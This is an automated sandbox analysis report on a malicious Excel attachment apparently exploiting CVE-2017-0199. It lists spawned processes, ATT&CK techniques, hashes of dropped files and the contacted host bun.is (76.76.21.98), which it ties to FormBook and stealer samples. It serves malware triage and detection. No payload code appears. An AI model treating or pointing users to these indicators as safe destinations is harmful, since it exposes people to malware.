Windows
Analysis Report
Ref_Order04.xls
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- EXCEL.EXE (PID: 1908 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - AcroRd32.exe (PID: 3088 cmdline:
"C:\Progra m Files (x 86)\Adobe\ Acrobat Re ader DC\Re ader\AcroR d32.exe" - Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817) - RdrCEF.exe (PID: 3400 cmdline:
"C:\Progra m Files (x 86)\Adobe\ Acrobat Re ader DC\Re ader\AcroC EF\RdrCEF. exe" --bac kgroundcol or=1651404 3 MD5: 326A645391A97C760B60C558A35BB068)
- cleanup
Source: | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: |
Source: | Author: X__Junior (Nextron Systems): |
Source: | Author: frack113: |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Stream path 'MBD0001E586/\x1Ole' : | ||
Source: | Stream path 'MBD0001E586/\x1Ole' : |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: | ||
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Stream path 'MBD0001E584/CONTENTS' entropy: | ||
Source: | Stream path 'Workbook' entropy: | ||
Source: | Stream path 'MBD0001E584/CONTENTS' entropy: | ||
Source: | Stream path 'Workbook' entropy: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 13 Exploitation for Client Execution | Path Interception | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
26% | ReversingLabs | Document-Office.Exploit.CVE-2017-0199 | ||
27% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira URL Cloud | phishing | ||
7% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bun.is | 76.76.21.98 | true | false |
| unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
76.76.21.98 | bun.is | United States | 16509 | AMAZON-02US | false |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1430742 |
Start date and time: | 2024-04-24 06:49:49 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 14s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Ref_Order04.xls |
Detection: | MAL |
Classification: | mal68.expl.winXLS@10/23@1/1 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
06:51:05 | API Interceptor | |
06:51:20 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
76.76.21.98 | Get hash | malicious | FormBook, PureLog Stealer | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
bun.is | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
AMAZON-02US | Get hash | malicious | Mirai, Okiru | Browse |
| |
Get hash | malicious | Python Stealer | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | PureLog Stealer, Xmrig, zgRAT | Browse |
| ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
|
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 270336 |
Entropy (8bit): | 0.0018885380473555064 |
Encrypted: | false |
SSDEEP: | 3:MsEllllkEthXllkl2zE+/pRDQ+:/M/xT02zBlQ+ |
MD5: | 7E3D4B739F9FA9DD2E64442186DFE098 |
SHA1: | 88E2764FE0BB443866877C5B332BE3DC3A907AD2 |
SHA-256: | D3A8660490BB7C951FA100B46C85195F71F1BB894207896F43AEBCF423076C5E |
SHA-512: | 2B67EBB1735E4E41BD55C11A875840C51252634B92FC3FDDCB4EF2A3E4C48DB3887C367582D0A9CD7ADAE9ABB25F3D5A242E9A7D37464CF397B81B5779F9B23F |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.231344302669386 |
Encrypted: | false |
SSDEEP: | 6:2hXjq2PP2nKuAl9OmbnIFUt8nhXVZmw+nhXHkwOP2nKuAl9OmbjLJ:YzvWHAahFUt8hl/+h357HAaSJ |
MD5: | 3D6981488EE65ACBA1EC63A2C907A9AB |
SHA1: | C789C66896DAC90EE9B9D8DA41DCA010C28E5159 |
SHA-256: | 9C5D1B8596C120FA4A5E1BF0303FBAF38F7D06BABA39B6D2E5CB9A222ECEF961 |
SHA-512: | C5E62DF6C82DB851E5E468D7387B660CE20CECB5E5095B4F112B3D82D52579DF14934C8A75A1302DC049A96C8D39A78AF7B3345B8DE21944F9C8F3459D6BE9EA |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.231344302669386 |
Encrypted: | false |
SSDEEP: | 6:2hXjq2PP2nKuAl9OmbnIFUt8nhXVZmw+nhXHkwOP2nKuAl9OmbjLJ:YzvWHAahFUt8hl/+h357HAaSJ |
MD5: | 3D6981488EE65ACBA1EC63A2C907A9AB |
SHA1: | C789C66896DAC90EE9B9D8DA41DCA010C28E5159 |
SHA-256: | 9C5D1B8596C120FA4A5E1BF0303FBAF38F7D06BABA39B6D2E5CB9A222ECEF961 |
SHA-512: | C5E62DF6C82DB851E5E468D7387B660CE20CECB5E5095B4F112B3D82D52579DF14934C8A75A1302DC049A96C8D39A78AF7B3345B8DE21944F9C8F3459D6BE9EA |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF5ff8c1.TMP (copy)
Download File
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.231344302669386 |
Encrypted: | false |
SSDEEP: | 6:2hXjq2PP2nKuAl9OmbnIFUt8nhXVZmw+nhXHkwOP2nKuAl9OmbjLJ:YzvWHAahFUt8hl/+h357HAaSJ |
MD5: | 3D6981488EE65ACBA1EC63A2C907A9AB |
SHA1: | C789C66896DAC90EE9B9D8DA41DCA010C28E5159 |
SHA-256: | 9C5D1B8596C120FA4A5E1BF0303FBAF38F7D06BABA39B6D2E5CB9A222ECEF961 |
SHA-512: | C5E62DF6C82DB851E5E468D7387B660CE20CECB5E5095B4F112B3D82D52579DF14934C8A75A1302DC049A96C8D39A78AF7B3345B8DE21944F9C8F3459D6BE9EA |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.005597679101775777 |
Encrypted: | false |
SSDEEP: | 3:ImtVOM1xVlt/XSxdltIt/l:IiVfxlKxdXI1l |
MD5: | FD55D575475A6BD81B055F46FA34BA8B |
SHA1: | 289A6344929F221E19D2F9097A5907FE42C03855 |
SHA-256: | 261CE45767DBF1E61AAF67C5EC1D75C2FF5C02681DF96897D5B0EC56A0F8C2AB |
SHA-512: | F2247D89C3268E838AE6F4BCDC1C4BB9C60E4F2E05B1763CD152811661A00B8BFC467F71009894676E38CE31229DF35F6FC9F2F19C2911698012D0594697F098 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 536 |
Entropy (8bit): | 5.17576513886526 |
Encrypted: | false |
SSDEEP: | 12:T4RFQ8idRuMgxg6dxs3yBFTtDcSTAzidRuOPgxg601s3yBFDHpcSa:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBa |
MD5: | 4D5E3CD969F14362210F0473720C5528 |
SHA1: | AFD90E9888759B809F78E87D5550B601A288A0A3 |
SHA-256: | 79D95D01FDE7FC7C890CD62734A7F203B12A5D44A56D6009D0E43E40D99682AE |
SHA-512: | B10C157945432CC8944E63A28CA3420CAD0C6B87BABC77BB5437DA5E3DF0CDEB657D410F28FA61D314E86269B8D1AC5972B0792D3E78787DFCE496EEE979DF64 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 536 |
Entropy (8bit): | 5.17576513886526 |
Encrypted: | false |
SSDEEP: | 12:T4RFQ8idRuMgxg6dxs3yBFTtDcSTAzidRuOPgxg601s3yBFDHpcSa:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBa |
MD5: | 4D5E3CD969F14362210F0473720C5528 |
SHA1: | AFD90E9888759B809F78E87D5550B601A288A0A3 |
SHA-256: | 79D95D01FDE7FC7C890CD62734A7F203B12A5D44A56D6009D0E43E40D99682AE |
SHA-512: | B10C157945432CC8944E63A28CA3420CAD0C6B87BABC77BB5437DA5E3DF0CDEB657D410F28FA61D314E86269B8D1AC5972B0792D3E78787DFCE496EEE979DF64 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 536 |
Entropy (8bit): | 5.17576513886526 |
Encrypted: | false |
SSDEEP: | 12:T4RFQ8idRuMgxg6dxs3yBFTtDcSTAzidRuOPgxg601s3yBFDHpcSa:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBa |
MD5: | 4D5E3CD969F14362210F0473720C5528 |
SHA1: | AFD90E9888759B809F78E87D5550B601A288A0A3 |
SHA-256: | 79D95D01FDE7FC7C890CD62734A7F203B12A5D44A56D6009D0E43E40D99682AE |
SHA-512: | B10C157945432CC8944E63A28CA3420CAD0C6B87BABC77BB5437DA5E3DF0CDEB657D410F28FA61D314E86269B8D1AC5972B0792D3E78787DFCE496EEE979DF64 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9566 |
Entropy (8bit): | 5.226610011802065 |
Encrypted: | false |
SSDEEP: | 192:eTA2j6Q6T766x626Oz6r606+6bfs6JtRZ65tsu6rtG16lMXY5B5Cfk:es4p0vTLcdfIfsmtRZEtsuatG1gMIzV |
MD5: | 63B24EA3A13EAC476D6309BB202EF459 |
SHA1: | 89502C393549C20C933E4553F51F74F3DBE085EF |
SHA-256: | 2B4BE0BED267BBD4E4FFFC912A6C7ED6A8D4735DCF9B69FF90F37CDDEF4110EA |
SHA-512: | 2CB315DD00867DEE3A2CBC4017B59C53B41E817216FE0111A60947E1F0D81FF6767D8F7B5C406AAF9E6516BE716A086642AFFABBEFBE4C5B260437C89E3535EC |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9566 |
Entropy (8bit): | 5.226610011802065 |
Encrypted: | false |
SSDEEP: | 192:eTA2j6Q6T766x626Oz6r606+6bfs6JtRZ65tsu6rtG16lMXY5B5Cfk:es4p0vTLcdfIfsmtRZEtsuatG1gMIzV |
MD5: | 63B24EA3A13EAC476D6309BB202EF459 |
SHA1: | 89502C393549C20C933E4553F51F74F3DBE085EF |
SHA-256: | 2B4BE0BED267BBD4E4FFFC912A6C7ED6A8D4735DCF9B69FF90F37CDDEF4110EA |
SHA-512: | 2CB315DD00867DEE3A2CBC4017B59C53B41E817216FE0111A60947E1F0D81FF6767D8F7B5C406AAF9E6516BE716A086642AFFABBEFBE4C5B260437C89E3535EC |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 128373 |
Entropy (8bit): | 1.984352562880039 |
Encrypted: | false |
SSDEEP: | 384:hNzyk+spBXiosQUYuoB7OdnGbLq+ACtKzZQ9w/fQ1D+v+W2gnHwvAgIEyXG1oJ/J:nUwvgnHwvAP |
MD5: | B4621E956E08FFC84D8E099B27014FEE |
SHA1: | CB4604EED70C03ABADD11C5EF15E566B8A9802E4 |
SHA-256: | 0C42B243A4C3673436D22F0C51033E2306005CDB0CFCB82A849452BD3E741CF7 |
SHA-512: | A99A6769B42241891C83EDD62CD4E4027BBF2F5BC716B4ED01CFDBE7312526C5DA8A3D37EB2D471C0A707952A6D8C9143A921FA7428B9F46105583549540DC47 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74B64408.emf
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 884312 |
Entropy (8bit): | 1.2944965349348616 |
Encrypted: | false |
SSDEEP: | 1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw |
MD5: | 9ABE7EB352E0DB96B52C99AC2FDEA85F |
SHA1: | 8DC45D02308275BA32B7FFB320A3042256D40C8B |
SHA-256: | EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869 |
SHA-512: | E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93FFC36E.emf
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 433328 |
Entropy (8bit): | 5.8206344778963315 |
Encrypted: | false |
SSDEEP: | 6144:Eifm7kwvqU4iyCbPUV7gdaI6z0R/sjBx2:El7kwvqULUVS |
MD5: | 6B99820E458A1554581172871C434794 |
SHA1: | AA00D426A3839A846BC0AF34F9482436B4644A21 |
SHA-256: | DF2A8C72AACDBCA3E8A08E06B12883E26FDBDD897663066C1CF2E2ADC191DBFB |
SHA-512: | E208704C45CAE468109739AB538DEABA7065855CC6390C0B5B03C74CC3604B68AE88326CF19F04F0BA3758E27CEA109D00552F36C30C94C4CD88FD3992AF9151 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFC4C163.emf
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330948 |
Entropy (8bit): | 4.968960210622998 |
Encrypted: | false |
SSDEEP: | 3072:U0Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:U0Bd8yCKdQRzw4muaZ9TARfMDcFi |
MD5: | 91332E8817A65272B66F6E4358538A1E |
SHA1: | D78D03B17F1BA6148A466494DAA7C800CD977EE4 |
SHA-256: | AE74113545E649795ABE01344C3BC2243F089D32F5187A6E76DB47EF0218A41E |
SHA-512: | 238AA45D6498CCF7A04260B69E4DAAD3978A83ED112639980B4711AD403986A9A7D42BEEAEDFA8698A5E8029AC014FB46578D55000A850CD039EFD2DA1A886E7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F45EDAE1.emf
Download File
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 884312 |
Entropy (8bit): | 1.2944875740888722 |
Encrypted: | false |
SSDEEP: | 1536:k3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:5ux/ZiOE85e+8J2dvRcvMyw |
MD5: | B6DFB3AA7AC4A1A52336C30FA821857B |
SHA1: | 66ECB808A516AC5B07A01CDFCAD65FD7B9907619 |
SHA-256: | E22202331F689D7568E674B0DCD895DF66FAC5980498F05A846DE244AB3394C4 |
SHA-512: | A13562F976BCBEEF7D4B4926C37E39BFD4C588EF6E746792B806E6737C91604175395021D4884493D764CE7F0EE2ACC6C7D03A6045A5B4ED6616E5D7E4C9FE94 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155648 |
Entropy (8bit): | 6.379715205999407 |
Encrypted: | false |
SSDEEP: | 3072:BZkJAg153pIYYFxEtjPOtioVjDGUU1qfDlaGGx+cugLX0d6vwE/zDiamh3mJUxLy:BZunAxEtjPOtioVjDGUU1qfDlavx+fg/ |
MD5: | FE33C379A1B420B679015AE46AAB85A0 |
SHA1: | D07BF94EC2A04D0BE7DDEBDAB52ABE589CDB49DD |
SHA-256: | 6B94BEA53556D9C2E58DCCBA1AF0C70F19003211F86D08FBFCC240E59FD2F162 |
SHA-512: | 33CF352D34CBCB7BF0A240ADE4939E55B6F95AF2D5AD4F8AE3919CAC7C381B591D97A529153A074D2516E2F9E831EA807BCDCB34122BA158899A382559F238D6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10240 |
Entropy (8bit): | 0.6739662216458647 |
Encrypted: | false |
SSDEEP: | 12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R |
MD5: | C61F99FE7BEE945FC31B62121BE075CD |
SHA1: | 083BBD0568633FECB8984002EB4FE8FA08E17DD9 |
SHA-256: | 1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732 |
SHA-512: | 46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 24152 |
Entropy (8bit): | 0.7532185028349225 |
Encrypted: | false |
SSDEEP: | 48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35 |
MD5: | 520FE964934AF1AB0CEBA2366830D0FA |
SHA1: | B90310ACA870261CB619FDFD1E54E1B1A25074FF |
SHA-256: | DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1 |
SHA-512: | A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 355328 |
Entropy (8bit): | 7.8384390402996065 |
Encrypted: | false |
SSDEEP: | 6144:uSunQxEtjPOtioVjDGUU1qfDlavx+fgLX0d6XivFbVIO/Z6wXlyeFf5mTy/1zwqs:uTZYbVDMwXlHNmy/5Xl8D |
